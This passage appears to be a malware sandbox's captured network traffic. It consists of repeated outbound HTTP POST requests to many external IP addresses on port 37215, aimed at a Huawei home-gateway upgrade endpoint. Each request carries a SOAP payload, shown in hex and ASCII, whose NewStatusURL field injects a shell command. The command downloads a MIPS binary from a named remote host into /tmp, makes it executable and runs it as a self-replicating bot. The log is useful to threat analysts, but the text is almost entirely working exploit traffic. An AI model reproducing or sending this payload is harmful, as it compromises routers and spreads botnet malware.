                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          909192.168.2.2341918197.221.74.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266530037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          910192.168.2.234282674.145.60.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266576052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          911192.168.2.2350142193.0.241.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266590118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          912192.168.2.2338786197.85.148.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266594887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          913192.168.2.2334578157.235.244.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266604900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          914192.168.2.2353350197.198.65.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266622066 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          915192.168.2.233631441.73.83.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266634941 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          916192.168.2.2334276197.98.165.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266648054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          917192.168.2.2346744197.203.224.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267066956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          918192.168.2.2333108204.118.66.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267077923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
